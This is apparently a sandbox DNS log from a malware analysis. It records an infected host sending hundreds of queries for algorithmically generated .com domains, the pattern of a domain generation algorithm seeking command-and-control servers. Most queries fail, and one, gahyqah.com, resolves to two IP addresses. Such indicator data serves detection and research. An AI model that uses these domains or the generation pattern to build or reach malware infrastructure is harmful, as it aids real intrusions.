Aug 23, 2024 18:43:33.572808027 CEST	1.1.1.1	192.168.2.5	0x1b39	Name error (3)	vonyryk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.572999954 CEST	1.1.1.1	192.168.2.5	0xd1ef	Name error (3)	qedyvap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.573419094 CEST	1.1.1.1	192.168.2.5	0x1143	Name error (3)	galyhib.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.574075937 CEST	1.1.1.1	192.168.2.5	0xeb5a	Name error (3)	qetyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.574671984 CEST	1.1.1.1	192.168.2.5	0x59f2	Name error (3)	vopycoc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.576555967 CEST	1.1.1.1	192.168.2.5	0x3911	Name error (3)	gatycis.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.576572895 CEST	1.1.1.1	192.168.2.5	0x97c4	Name error (3)	lyvywar.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.576625109 CEST	1.1.1.1	192.168.2.5	0xbf3	Name error (3)	ganyrew.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.576652050 CEST	1.1.1.1	192.168.2.5	0xf950	Name error (3)	gahyfyh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.576661110 CEST	1.1.1.1	192.168.2.5	0x5f59	Name error (3)	puvywal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.576674938 CEST	1.1.1.1	192.168.2.5	0xd025	Name error (3)	qebyrel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.576684952 CEST	1.1.1.1	192.168.2.5	0xf356	Name error (3)	lygyfej.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.576723099 CEST	1.1.1.1	192.168.2.5	0x7e2d	Name error (3)	puryxuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.576948881 CEST	1.1.1.1	192.168.2.5	0xf270	Name error (3)	vowyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.577008963 CEST	1.1.1.1	192.168.2.5	0xa94c	Name error (3)	gacyqoz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.579365969 CEST	1.1.1.1	192.168.2.5	0xcbb4	Name error (3)	qegyfeq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.582784891 CEST	1.1.1.1	192.168.2.5	0xd540	Name error (3)	qexyqip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.582793951 CEST	1.1.1.1	192.168.2.5	0x3dc7	Name error (3)	vofydak.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.582803965 CEST	1.1.1.1	192.168.2.5	0x84cb	Name error (3)	pufydaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.583049059 CEST	1.1.1.1	192.168.2.5	0x4466	Name error (3)	puzymup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.583339930 CEST	1.1.1.1	192.168.2.5	0xdb33	Name error (3)	qeqylyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.594250917 CEST	1.1.1.1	192.168.2.5	0xf526	Name error (3)	lysyvax.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.595762968 CEST	1.1.1.1	192.168.2.5	0x9b66	Name error (3)	lykygun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.595772028 CEST	1.1.1.1	192.168.2.5	0x4e1a	Name error (3)	pupycop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.595781088 CEST	1.1.1.1	192.168.2.5	0xd5a4	Name error (3)	pujygug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.595814943 CEST	1.1.1.1	192.168.2.5	0x1071	Name error (3)	lyryxud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.599255085 CEST	1.1.1.1	192.168.2.5	0xb48c	Name error (3)	vocyqot.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.599263906 CEST	1.1.1.1	192.168.2.5	0xdd70	Name error (3)	qekyhug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.604123116 CEST	1.1.1.1	192.168.2.5	0x79de	Name error (3)	lyxymix.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.604459047 CEST	1.1.1.1	192.168.2.5	0x86f5	Name error (3)	gadydow.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.609288931 CEST	1.1.1.1	192.168.2.5	0x7fd6	Name error (3)	gaqyzyb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.729681969 CEST	1.1.1.1	192.168.2.5	0x3bf3	Name error (3)	vojygym.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.741807938 CEST	1.1.1.1	192.168.2.5	0x4d86	Name error (3)	lymylen.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.742877960 CEST	1.1.1.1	192.168.2.5	0x6c1f	Name error (3)	volymuc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.743128061 CEST	1.1.1.1	192.168.2.5	0x47d3	Name error (3)	pumyleg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.744410992 CEST	1.1.1.1	192.168.2.5	0x8ea	Name error (3)	vonykam.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.744421005 CEST	1.1.1.1	192.168.2.5	0x2cb8	Name error (3)	pupypil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.744440079 CEST	1.1.1.1	192.168.2.5	0xb5a0	Name error (3)	ganykah.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.745897055 CEST	1.1.1.1	192.168.2.5	0xf700	Name error (3)	lykynyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.746922970 CEST	1.1.1.1	192.168.2.5	0x40cc	Name error (3)	pujybev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.747253895 CEST	1.1.1.1	192.168.2.5	0x918a	Name error (3)	gatypuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.747849941 CEST	1.1.1.1	192.168.2.5	0xef56	Name error (3)	gahyvab.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.748270035 CEST	1.1.1.1	192.168.2.5	0x29f1	Name error (3)	lyrytyx.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.748677015 CEST	1.1.1.1	192.168.2.5	0x2f06	Name error (3)	qedysol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.749046087 CEST	1.1.1.1	192.168.2.5	0x48f3	Name error (3)	vocyjik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.749491930 CEST	1.1.1.1	192.168.2.5	0x615f	Name error (3)	lyvyjoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.751137018 CEST	1.1.1.1	192.168.2.5	0x855f	Name error (3)	vowyrec.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.751616955 CEST	1.1.1.1	192.168.2.5	0x8ed9	Name error (3)	vofycim.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.751674891 CEST	1.1.1.1	192.168.2.5	0xb3ee	Name error (3)	qeqyrav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.751806974 CEST	1.1.1.1	192.168.2.5	0xc19c	Name error (3)	lygyvon.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.751851082 CEST	1.1.1.1	192.168.2.5	0x81e4	Name error (3)	galynus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.752382994 CEST	1.1.1.1	192.168.2.5	0xbafd	Name error (3)	pufycog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.752405882 CEST	1.1.1.1	192.168.2.5	0xa817	Name error (3)	lyxygur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.752693892 CEST	1.1.1.1	192.168.2.5	0xb135	Name error (3)	puzygyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.753317118 CEST	1.1.1.1	192.168.2.5	0x90f7	Name error (3)	gadycih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.753590107 CEST	1.1.1.1	192.168.2.5	0x7436	Name error (3)	qegyvag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.753737926 CEST	1.1.1.1	192.168.2.5	0xac57	Name error (3)	ganyqib.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.753746986 CEST	1.1.1.1	192.168.2.5	0xf0a5	Name error (3)	qedyxuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.753755093 CEST	1.1.1.1	192.168.2.5	0x25c5	Name error (3)	gaqyres.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.754069090 CEST	1.1.1.1	192.168.2.5	0x9272	Name error (3)	volygyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.754159927 CEST	1.1.1.1	192.168.2.5	0x6687	Name error (3)	lymywad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.754297018 CEST	1.1.1.1	192.168.2.5	0xf50	Name error (3)	puvyjiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.754409075 CEST	1.1.1.1	192.168.2.5	0xa20e	Name error (3)	purytyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.755430937 CEST	1.1.1.1	192.168.2.5	0x9fdb	Name error (3)	pupyxuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.755542040 CEST	1.1.1.1	192.168.2.5	0x5531	Name error (3)	gatyzyw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.755847931 CEST	1.1.1.1	192.168.2.5	0xa684	Name error (3)	lysyxuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.756036997 CEST	1.1.1.1	192.168.2.5	0x4f47	Name error (3)	pumywov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.756201029 CEST	1.1.1.1	192.168.2.5	0xcef3	Name error (3)	vocymum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.756329060 CEST	1.1.1.1	192.168.2.5	0xce3e	Name error (3)	gahydos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.757128954 CEST	1.1.1.1	192.168.2.5	0x2ee	Name error (3)	lyryler.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.757513046 CEST	1.1.1.1	192.168.2.5	0xff43	Name error (3)	qegysiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.757889032 CEST	1.1.1.1	192.168.2.5	0x5a8d	Name error (3)	vopyzyk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.758124113 CEST	1.1.1.1	192.168.2.5	0xf9	Name error (3)	vowykat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.758826971 CEST	1.1.1.1	192.168.2.5	0x4b0c	Name error (3)	lygysid.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.764672041 CEST	1.1.1.1	192.168.2.5	0x321	Name error (3)	lysysir.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.765053034 CEST	1.1.1.1	192.168.2.5	0x756d	Name error (3)	qekynyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.766765118 CEST	1.1.1.1	192.168.2.5	0xe795	Name error (3)	qebykoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.771830082 CEST	1.1.1.1	192.168.2.5	0x18	Name error (3)	qetytup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.771982908 CEST	1.1.1.1	192.168.2.5	0x496d	Name error (3)	vopyput.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.774557114 CEST	1.1.1.1	192.168.2.5	0xd803	Name error (3)	vojybef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.774985075 CEST	1.1.1.1	192.168.2.5	0x48c0	Name error (3)	gacyhuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.775963068 CEST	1.1.1.1	192.168.2.5	0xe498	Name error (3)	pujydap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.776618004 CEST	1.1.1.1	192.168.2.5	0x655b	Name error (3)	vonyqof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.776667118 CEST	1.1.1.1	192.168.2.5	0x2155	Name error (3)	qekyfep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.776959896 CEST	1.1.1.1	192.168.2.5	0xf64a	Name error (3)	puvymug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.777070045 CEST	1.1.1.1	192.168.2.5	0xca5e	Name error (3)	qexyhul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.777163029 CEST	1.1.1.1	192.168.2.5	0xd599	Name error (3)	vojydoc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.777476072 CEST	1.1.1.1	192.168.2.5	0x5483	Name error (3)	galyfez.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.777565956 CEST	1.1.1.1	192.168.2.5	0x716	Name error (3)	lyvymun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.777980089 CEST	1.1.1.1	192.168.2.5	0x7c2	Name error (3)	lykyfax.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.778928041 CEST	1.1.1.1	192.168.2.5	0x140	Name error (3)	purylal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.779048920 CEST	1.1.1.1	192.168.2.5	0x2db5	Name error (3)	qexynyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.780061007 CEST	1.1.1.1	192.168.2.5	0x87fd	Name error (3)	qebyqig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.908487082 CEST	1.1.1.1	192.168.2.5	0x7225	Name error (3)	pufypuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.912148952 CEST	1.1.1.1	192.168.2.5	0x1cbc	Name error (3)	qetylel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.292174101 CEST	1.1.1.1	192.168.2.5	0x18c	Name error (3)	vofypuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.292526960 CEST	1.1.1.1	192.168.2.5	0x2068	Name error (3)	lyxynej.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.292978048 CEST	1.1.1.1	192.168.2.5	0x9a2e	Name error (3)	gaqykoz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.294616938 CEST	1.1.1.1	192.168.2.5	0xed71	Name error (3)	puzybeq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.295414925 CEST	1.1.1.1	192.168.2.5	0xa5d4	Name error (3)	lymyjix.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.296324968 CEST	1.1.1.1	192.168.2.5	0x7a7f	Name error (3)	galyvaw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.296539068 CEST	1.1.1.1	192.168.2.5	0xbbc9	Name error (3)	volybak.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.298501968 CEST	1.1.1.1	192.168.2.5	0xd134	Name error (3)	qekyvol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.299305916 CEST	1.1.1.1	192.168.2.5	0x6761	Name error (3)	pupyteg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.300874949 CEST	1.1.1.1	192.168.2.5	0x3c26	Name error (3)	lyvygyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.301379919 CEST	1.1.1.1	192.168.2.5	0x3701	Name error (3)	gatyrah.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.301748991 CEST	1.1.1.1	192.168.2.5	0x101c	Name error (3)	vojycit.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.301881075 CEST	1.1.1.1	192.168.2.5	0x38a9	Name error (3)	lykyvor.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.302412033 CEST	1.1.1.1	192.168.2.5	0x289c	Name error (3)	puvygyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.302880049 CEST	1.1.1.1	192.168.2.5	0xd8f6	Name error (3)	lyrywoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.303107023 CEST	1.1.1.1	192.168.2.5	0x2f38	Name error (3)	vocygef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.303385019 CEST	1.1.1.1	192.168.2.5	0x27f1	Name error (3)	gacyfeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.303764105 CEST	1.1.1.1	192.168.2.5	0x7d98	Name error (3)	vopyrem.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.303775072 CEST	1.1.1.1	192.168.2.5	0xa9ca	Name error (3)	purywoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.303989887 CEST	1.1.1.1	192.168.2.5	0x6f95	Name error (3)	lygyxux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.304255962 CEST	1.1.1.1	192.168.2.5	0x2252	Name error (3)	qegyxup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.306371927 CEST	1.1.1.1	192.168.2.5	0x4e41	Name error (3)	vowyqik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.310041904 CEST	1.1.1.1	192.168.2.5	0xa15	Name error (3)	pumyjip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.310583115 CEST	1.1.1.1	192.168.2.5	0x4c20	Name error (3)	pufyxyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.311574936 CEST	1.1.1.1	192.168.2.5	0x392f	Name error (3)	puzydog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.312067986 CEST	1.1.1.1	192.168.2.5	0x77b1	Name error (3)	gaqyqiw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.313026905 CEST	1.1.1.1	192.168.2.5	0xbb43	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.313680887 CEST	1.1.1.1	192.168.2.5	0x38e6	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.313692093 CEST	1.1.1.1	192.168.2.5	0xf62f	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.313695908 CEST	1.1.1.1	192.168.2.5	0xe397	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.313703060 CEST	1.1.1.1	192.168.2.5	0x1846	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.315313101 CEST	1.1.1.1	192.168.2.5	0x4d8d	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.315640926 CEST	1.1.1.1	192.168.2.5	0xf549	Name error (3)	qeqykop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.315788031 CEST	1.1.1.1	192.168.2.5	0xc41e	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.315903902 CEST	1.1.1.1	192.168.2.5	0xb58	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.316030025 CEST	1.1.1.1	192.168.2.5	0x30fc	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.316169977 CEST	1.1.1.1	192.168.2.5	0xee04	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.316821098 CEST	1.1.1.1	192.168.2.5	0x80e6	Name error (3)	gadypub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.316838026 CEST	1.1.1.1	192.168.2.5	0x954a	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.316848993 CEST	1.1.1.1	192.168.2.5	0x848f	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.317600012 CEST	1.1.1.1	192.168.2.5	0x88e9	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.317682981 CEST	1.1.1.1	192.168.2.5	0x7d4e	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.317744970 CEST	1.1.1.1	192.168.2.5	0x6df3	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.317754984 CEST	1.1.1.1	192.168.2.5	0x5471	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.318110943 CEST	1.1.1.1	192.168.2.5	0xfc9e	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.318262100 CEST	1.1.1.1	192.168.2.5	0x7df9	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.318411112 CEST	1.1.1.1	192.168.2.5	0x73d9	Name error (3)	vonyjuc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.318684101 CEST	1.1.1.1	192.168.2.5	0x3798	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.318701029 CEST	1.1.1.1	192.168.2.5	0x6b15	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.319176912 CEST	1.1.1.1	192.168.2.5	0xfad7	Name error (3)	qekyqop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.319271088 CEST	1.1.1.1	192.168.2.5	0xb739	Name error (3)	lygygin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.319446087 CEST	1.1.1.1	192.168.2.5	0xf499	Name error (3)	vonyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.319457054 CEST	1.1.1.1	192.168.2.5	0xab57	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.319574118 CEST	1.1.1.1	192.168.2.5	0x36e5	Name error (3)	gadyfuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.319844961 CEST	1.1.1.1	192.168.2.5	0xa0a9	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.320225954 CEST	1.1.1.1	192.168.2.5	0x44e3	Name error (3)	pumyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.320235968 CEST	1.1.1.1	192.168.2.5	0x84ac	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.320394993 CEST	1.1.1.1	192.168.2.5	0x7941	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.321069002 CEST	1.1.1.1	192.168.2.5	0x393e	Name error (3)	pujycil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.321331024 CEST	1.1.1.1	192.168.2.5	0xf376	Name error (3)	vofygum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.322891951 CEST	1.1.1.1	192.168.2.5	0xec85	Name error (3)	qetyraq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.323153973 CEST	1.1.1.1	192.168.2.5	0x75a4	Name error (3)	gahycuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.327492952 CEST	1.1.1.1	192.168.2.5	0xd672	Name error (3)	ganyhus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.329210043 CEST	1.1.1.1	192.168.2.5	0x4c05	Name error (3)	qexyfag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.332426071 CEST	1.1.1.1	192.168.2.5	0x1c03	Name error (3)	vofyzyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.333401918 CEST	1.1.1.1	192.168.2.5	0x746f	Name error (3)	lyxyfan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.333930969 CEST	1.1.1.1	192.168.2.5	0xa59	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.334175110 CEST	1.1.1.1	192.168.2.5	0x7b6a	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.334482908 CEST	1.1.1.1	192.168.2.5	0xd18e	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.334765911 CEST	1.1.1.1	192.168.2.5	0x88d4	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.335330963 CEST	1.1.1.1	192.168.2.5	0xfe93	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.335422039 CEST	1.1.1.1	192.168.2.5	0x82f6	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.336360931 CEST	1.1.1.1	192.168.2.5	0x8d78	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.336360931 CEST	1.1.1.1	192.168.2.5	0x8d78	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.336560011 CEST	1.1.1.1	192.168.2.5	0x3818	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.336771965 CEST	1.1.1.1	192.168.2.5	0x8080	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.337481976 CEST	1.1.1.1	192.168.2.5	0x36f	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.337565899 CEST	1.1.1.1	192.168.2.5	0x2beb	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.337694883 CEST	1.1.1.1	192.168.2.5	0x47b2	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.337879896 CEST	1.1.1.1	192.168.2.5	0x2c9c	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.339313984 CEST	1.1.1.1	192.168.2.5	0x7f84	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.339323997 CEST	1.1.1.1	192.168.2.5	0x52d1	Name error (3)	volyqat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.339895964 CEST	1.1.1.1	192.168.2.5	0x801d	Name error (3)	qedyfyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.340962887 CEST	1.1.1.1	192.168.2.5	0x4a0b	Name error (3)	qeqyxov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.341068983 CEST	1.1.1.1	192.168.2.5	0x7cdd	Name error (3)	gaqycos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.341475010 CEST	1.1.1.1	192.168.2.5	0x27e1	Name error (3)	vowycac.com	none	none	A (IP address)	IN (0x0001)	false
